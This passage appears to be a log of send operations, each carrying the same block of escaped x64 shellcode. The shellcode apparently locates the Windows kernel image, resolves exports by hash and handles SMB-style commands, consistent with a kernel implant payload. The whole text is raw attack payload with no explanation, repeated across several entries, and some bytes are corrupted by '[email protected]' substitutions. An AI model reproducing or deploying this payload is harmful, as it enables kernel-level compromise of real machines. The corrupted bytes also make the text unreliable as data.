8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 4, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 5, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 6, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\